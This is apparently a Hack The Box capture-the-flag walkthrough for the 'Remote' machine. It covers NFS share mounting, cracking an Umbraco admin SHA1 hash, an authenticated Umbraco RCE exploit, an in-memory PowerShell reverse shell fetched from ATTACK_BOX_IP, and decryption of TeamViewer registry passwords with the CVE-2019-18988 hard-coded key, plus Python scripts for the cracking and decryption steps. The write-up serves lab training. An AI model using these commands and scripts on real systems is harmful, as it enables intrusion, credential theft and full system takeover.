REMOTE HTB WRITE UP | WALKTHROUGH
Remote is a good HTB machine to learn about the danger of exposing file shares on a network and of running outdated software. In this article I show the methods I used to pwn this machine.
RECONNAISSANCE
Before starting, we need some information about the target machine, and one of the best ways to get it is an nmap scan:
nmap -sC -sV -O TARGET_IP
Here is the output of the scan:
Many ports are open. First, note port 21 (FTP), which allows anonymous login, and port 80, which means a website is hosted on the target machine.
FTP ANONYMOUS LOGIN
Anonymous login means we can log into the FTP server with the username anonymous and an empty (or arbitrary) password.
Once connected, use "ls" to list the files available on the server.
Nothing, what a disappointment 😓. But let's not give up and try something else.
MOUNTD SHARED FILES
Look at the last open port: 2049 is NFS (nmap reports it as nfs/mountd), meaning the target exports file shares that we can mount on our local machine.
First, list the exports with the following command:
showmount -e TARGET_IP
showmount -e lists every directory exported by the target and which hosts are allowed to mount it; here it is open to everyone on the network.
As seen in the previous output, there is a /site_backups export, which we can mount with the following command:
sudo mount -t nfs TARGET_IP:/site_backups victim
The export is mounted into the victim folder I created beforehand.
It looks like a backup of the CMS used by the site hosted on the target (remember, port 80 is open).
A little research on the internet shows that the Umbraco CMS stores its data, including user credentials, in a SQL Server Compact database named Umbraco.sdf inside the App_Data directory.
It is a binary database, so open it with any editor you want (I use nano) or run strings on it, and search for the admin account.
We can see (underlined) the username, the password hash and the hash algorithm used (SHA1). Hashes cannot be decrypted, only cracked, so we use John the Ripper to crack it with this command:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 hash.txt
hash.txt is the file into which I pasted the password hash. Afterwards, show the cracked password with the following command:
john --show hash.txt
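As an added example (not code from the original write-up), the same extraction and cracking done in Python: it scans a constructed byte blob laid out like the relevant part of Umbraco.sdf, pulls out the login, the hex SHA1 digest and the algorithm marker, and then tries candidates the way john --format=raw-sha1 does. The exact byte layout and the sample password are assumptions for the demo; with a real Umbraco.sdf and rockyou.txt, pass the file contents and load_wordlist("/usr/share/wordlists/rockyou.txt") to crack_from_sdf.

```python
import hashlib
import re

# Constructed sample: a fragment mimicking the byte layout seen in Umbraco.sdf, where
# the login, the hex SHA1 digest and the hash-algorithm marker sit next to each other.
# The plaintext password is only used here to build the sample; a real file holds the hash.
_SAMPLE_PASSWORD = "baconandcheese"  # assumption for the demo
SAMPLE_SDF = (
    b"\x00\x01admin\x00\x00admindefaulten-US\x00"
    + b"admin@htb.local"
    + hashlib.sha1(_SAMPLE_PASSWORD.encode()).hexdigest().encode()
    + b'{"hashAlgorithm":"SHA1"}'
    + b"\x00\x00\xffother database content"
)

# Login (e-mail) immediately followed by 40 hex chars, then the JSON marker naming
# the algorithm. The layout is an assumption; adjust the pattern for other dumps.
CRED_RE = re.compile(
    rb"(?P<user>[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+)"
    rb"(?P<hash>[0-9a-fA-F]{40})"
    rb'\{"hashAlgorithm":"(?P<alg>[A-Za-z0-9]+)"\}'
)


def extract_credentials(blob: bytes):
    """Return [(user, hex_hash, algorithm), ...] found in the raw database bytes."""
    return [
        (m.group("user").decode(), m.group("hash").decode().lower(), m.group("alg").decode())
        for m in CRED_RE.finditer(blob)
    ]


def load_wordlist(path):
    """Yield candidates from a wordlist file such as rockyou.txt (latin-1 avoids decode errors)."""
    with open(path, encoding="latin-1") as f:
        for line in f:
            yield line.rstrip("\r\n")


def crack_sha1(hex_hash: str, wordlist):
    """Equivalent of john --format=raw-sha1: hash each candidate and compare digests."""
    target = hex_hash.lower()
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if hashlib.sha1(candidate.encode()).hexdigest() == target:
            return candidate
    return None


def crack_from_sdf(blob: bytes, wordlist):
    """Map each user found in the blob to the cracked password (None if not cracked)."""
    results = {}
    words = list(wordlist)  # the same list is reused for every user
    for user, h, alg in extract_credentials(blob):
        if alg.upper() != "SHA1":
            results[user] = None  # other algorithms: hand the hash to john with the right --format
            continue
        results[user] = crack_sha1(h, words)
    return results


if __name__ == "__main__":
    # Constructed stand-in for rockyou.txt
    demo_words = ["password", "umbraco", "baconandcheese", "letmein"]
    print(crack_from_sdf(SAMPLE_SDF, demo_words))
```

The Umbraco version on this box stores a plain hex SHA1; newer Umbraco releases default to salted HMAC-SHA256 in base64, which this pattern deliberately does not match, so check the hashAlgorithm marker before picking a john format.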
Now that we have credentials, we can log into the admin panel at http://TARGET_IP/umbraco
Once logged in, the Help panel shows the Umbraco version.
We use searchsploit to find known exploits for this version.
The exploit found (49488.py, an authenticated remote code execution in Umbraco, so it needs the credentials we just cracked) is used like this:
python /usr/share/exploitdb/exploits/aspx/webapps/49488.py -u username -p password -i 'http://TARGET_IP' -c 'command'
As shown in the screenshot below, with the credentials we gathered we can execute the whoami command.
The next step is to use this code execution to get a shell.
Windows reverse shell
To get a reverse shell between two machines we usually use netcat, but it is not installed by default on Windows. Instead we use a PowerShell script that connects a Windows shell back to our attack box.
First download it on the attack box with wget (use the raw URL: the github.com/.../blob/... page returns HTML, not the script):
wget https://raw.githubusercontent.com/martinsohn/PowerShell-reverse-shell/main/powershell-reverse-shell.ps1
Update the script with the attack box IP address and the port that the netcat listener will use.
Start a simple HTTP server on port 8000 in the directory containing the script; the victim will download it from the attack box.
Start a netcat listener, because the command below will download the PowerShell script and execute it immediately:
nc -lvnp PORT
The following command downloads the PowerShell script and executes it in memory (IEX over IWR, so nothing is written to disk); the script then connects back to our netcat listener.
python /usr/share/exploitdb/exploits/aspx/webapps/49488.py -u admin@htb.local -p baconandcheese -i 'http://TARGET_IP' -c powershell.exe -a 'IEX(IWR http://ATTACK_BOX_IP:8000/powershell-reverse-shell.ps1 -UseBasicParsing); powershell-reverse-shell ATTACK_BOX_IP PORT'
Back on our netcat listener, we are connected.
Once connected, you can easily get the user flag.
Privilege escalation
We are connected as a low-privileged user, but we can use this access to get more privileges.
Take a look at the files inside C:\Users\Public\Desktop
There is a shortcut to TeamViewer version 7. To verify that it is actually running, we check for the non-default service launched by TeamViewer with this command:
tasklist /svc
As seen in the output, TeamViewer7 is running.
I simply searched for "TeamViewer vulnerability" and found this: https://www.cvedetails.com/cve/CVE-2019-18988/. This vulnerability lets us decrypt the TeamViewer password stored on the machine, and such passwords are often reused for system accounts such as the administrator.
A short brief on the vulnerability: affected TeamViewer versions (7 through 14.7) store passwords in registry values encrypted with AES, but every installation uses the same hard-coded key and IV. Anyone who can read those registry values can therefore decrypt them with the public key, and on this machine the recovered password is also the local Administrator password.
Manual exploit
Once connected, we can print the values of the registry key with this command:
reg query HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7
As seen in the output, the password used to access the machine remotely is stored AES-encrypted (the SecurityPasswordAES value; the other *PasswordAES values hold other stored passwords).
We will use this small Python script from this site: https://web.archive.org/web/20200203175441/https://whynotsecurity.com/blog/teamviewer/, to decrypt the password (it needs the pycryptodome and hexdump packages: pip install pycryptodome hexdump).
import hexdump, binascii
from Crypto.Cipher import AES  # pycryptodome

class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        # TeamViewer uses AES-128 in CBC mode with a fixed key and IV (CVE-2019-18988)
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)

# Hard-coded key and IV shared by every TeamViewer installation
key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")

hex_str_cipher = "PASTE THE CIPHER PASSWORD HERE"  # REG_BINARY value from the registry, as one hex string
ciphertext = binascii.unhexlify(hex_str_cipher)

raw_un = AESCipher(key).decrypt(iv, ciphertext)
hexdump.hexdump(raw_un)  # show the raw plaintext bytes

# The plaintext is UTF-16, null-padded up to the AES block size
password = raw_un.decode('utf-16').rstrip('\x00')
print(password)
Don't forget to replace the placeholder in the code with the hex value copied from the registry output.
Then run the Python script and you get the password in clear text.
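As an added example (not the page's script and not TeamViewer's code), here is the same decryption wrapped in a parser for the reg query output, so every *PasswordAES value in the key is decrypted in one pass and the UTF-16 null padding is stripped instead of being printed. The registry dump below is constructed; encrypt_teamviewer exists only to build that sample with the public key and IV, and the passwords in it are made up. The block uses pycryptodome if present and falls back to the cryptography package.

```python
import re
from binascii import unhexlify

# Hard-coded TeamViewer key and IV, identical on every installation (CVE-2019-18988)
KEY = unhexlify("0602000000a400005253413100040000")
IV = unhexlify("0100010067244F436E6762F25EA8D704")


def _aes_cbc(data: bytes, decrypt: bool) -> bytes:
    """AES-128-CBC with the fixed key/IV, using whichever library is installed."""
    try:
        from Crypto.Cipher import AES  # pycryptodome, as in the script above
        cipher = AES.new(KEY, AES.MODE_CBC, IV)
        return cipher.decrypt(data) if decrypt else cipher.encrypt(data)
    except ImportError:
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        try:
            ctx = Cipher(algorithms.AES(KEY), modes.CBC(IV))
        except TypeError:  # older cryptography releases require an explicit backend
            from cryptography.hazmat.backends import default_backend
            ctx = Cipher(algorithms.AES(KEY), modes.CBC(IV), default_backend())
        op = ctx.decryptor() if decrypt else ctx.encryptor()
        return op.update(data) + op.finalize()


def decrypt_teamviewer(blob: bytes) -> str:
    """Decrypt one REG_BINARY value; the plaintext is UTF-16LE padded with nulls."""
    return _aes_cbc(blob, decrypt=True).decode("utf-16-le").rstrip("\x00")


def encrypt_teamviewer(password: str) -> bytes:
    """Only used here to build sample data the way the client stores it (assumed layout)."""
    raw = password.encode("utf-16-le")
    raw += b"\x00" * (-len(raw) % 16)  # zero-pad to the AES block size
    return _aes_cbc(raw, decrypt=False)


# Constructed sample of `reg query HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7` output.
# Value names are the ones the TeamViewer client writes; the version, ClientID and
# passwords are made up for the demo.
SAMPLE_REG_OUTPUT = "\r\n".join([
    r"HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\TeamViewer\Version7",
    "    Version    REG_SZ    7.0.0",
    "    ClientID    REG_DWORD    0x1234567",
    "    OptionsPasswordAES    REG_BINARY    " + encrypt_teamviewer("options-pw").hex().upper(),
    "    SecurityPasswordAES    REG_BINARY    " + encrypt_teamviewer("Hypothetical!Pass1").hex().upper(),
])

# One `reg query` line: value name, REG_BINARY, hex data
REG_BINARY_RE = re.compile(r"^\s*(\S+)\s+REG_BINARY\s+([0-9A-Fa-f]+)\s*$", re.M)


def recover_passwords(reg_output: str) -> dict:
    """Map every *PasswordAES REG_BINARY value in the reg query output to its plaintext."""
    found = {}
    for name, hexval in REG_BINARY_RE.findall(reg_output):
        if not name.endswith("PasswordAES"):
            continue
        data = unhexlify(hexval)
        if len(data) % 16:
            continue  # not whole AES blocks, so not a ciphertext this scheme produced
        found[name] = decrypt_teamviewer(data)
    return found


if __name__ == "__main__":
    for name, password in recover_passwords(SAMPLE_REG_OUTPUT).items():
        print(f"{name}: {password}")
```

On a real target, pipe the reg query output into a file, copy it back and feed the text to recover_passwords; the SecurityPasswordAES entry is the remote-access password discussed above.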
Now connect with impacket's psexec.py, which prompts for the password:
psexec.py Administrator@TARGET_IP
And we can easily get the root flag.